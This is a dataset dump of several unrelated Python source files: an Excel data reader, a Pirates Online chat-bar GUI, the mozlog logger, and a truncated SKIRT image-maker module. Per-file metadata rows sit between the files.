+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function thar reads data from excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| 34.156189
| 79
| 0.515516
| 4,033
| 34,771
| 4.313662
| 0.106868
| 0.01414
| 0.017819
| 0.01644
| 0.447836
| 0.396103
| 0.334713
| 0.284934
| 0.261654
| 0.241363
| 0
| 0.006891
| 0.3865
| 34,771
| 1,017
| 80
| 34.189774
| 0.808644
| 0.224239
| 0
| 0.403448
| 0
| 0
| 0.091609
| 0.000913
| 0
| 0
| 0
| 0.001967
| 0.017241
| 1
| 0.056897
| false
| 0.003448
| 0.013793
| 0.005172
| 0.143103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60bd44a6d884dfc054933f1d7828b758d91a71b3
| 15,921
|
py
|
Python
|
pirates/piratesgui/ChatBar.py
|
ksmit799/POTCO-PS
|
520d38935ae8df4b452c733a82c94dddac01e275
|
[
"Apache-2.0"
] | 8
|
2017-01-24T04:33:29.000Z
|
2020-11-01T08:36:24.000Z
|
pirates/piratesgui/ChatBar.py
|
ksmit799/Pirates-Online-Remake
|
520d38935ae8df4b452c733a82c94dddac01e275
|
[
"Apache-2.0"
] | 1
|
2017-03-02T18:05:17.000Z
|
2017-03-14T06:47:10.000Z
|
pirates/piratesgui/ChatBar.py
|
ksmit799/Pirates-Online-Remake
|
520d38935ae8df4b452c733a82c94dddac01e275
|
[
"Apache-2.0"
] | 11
|
2017-03-02T18:46:07.000Z
|
2020-11-01T08:36:26.000Z
|
# File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **None)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **None)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **args)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = 'John Sharkbait', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| 43.5
| 464
| 0.655172
| 1,593
| 15,921
| 6.490898
| 0.181419
| 0.032495
| 0.0147
| 0.018569
| 0.459188
| 0.394971
| 0.361025
| 0.309188
| 0.267215
| 0.200774
| 0
| 0.086765
| 0.228315
| 15,921
| 365
| 465
| 43.619178
| 0.754843
| 0.001256
| 0
| 0.363971
| 0
| 0
| 0.051959
| 0.011826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113971
| false
| 0.025735
| 0.033088
| 0.003676
| 0.172794
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60bd4912fb3c20a7cbfabbd3fdd321346095f54b
| 6,610
|
py
|
Python
|
mozmill-env/python/Lib/site-packages/mozlog/logger.py
|
lucashmorais/x-Bench
|
2080b8753dd6e45c2212666bcdb05327752a94e9
|
[
"MIT"
] | null | null | null |
mozmill-env/python/Lib/site-packages/mozlog/logger.py
|
lucashmorais/x-Bench
|
2080b8753dd6e45c2212666bcdb05327752a94e9
|
[
"MIT"
] | null | null | null |
mozmill-env/python/Lib/site-packages/mozlog/logger.py
|
lucashmorais/x-Bench
|
2080b8753dd6e45c2212666bcdb05327752a94e9
|
[
"MIT"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
# The can message be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overriden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
any affect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
| 36.519337
| 100
| 0.637065
| 810
| 6,610
| 5.120988
| 0.31358
| 0.031823
| 0.04918
| 0.030376
| 0.081485
| 0.058341
| 0.036162
| 0
| 0
| 0
| 0
| 0.00539
| 0.270197
| 6,610
| 180
| 101
| 36.722222
| 0.854478
| 0.366415
| 0
| 0.043956
| 0
| 0
| 0.07532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120879
| false
| 0.043956
| 0.043956
| 0
| 0.263736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c1a81157e41324b28041d302b03e92ee199d40
| 14,335
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined an this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
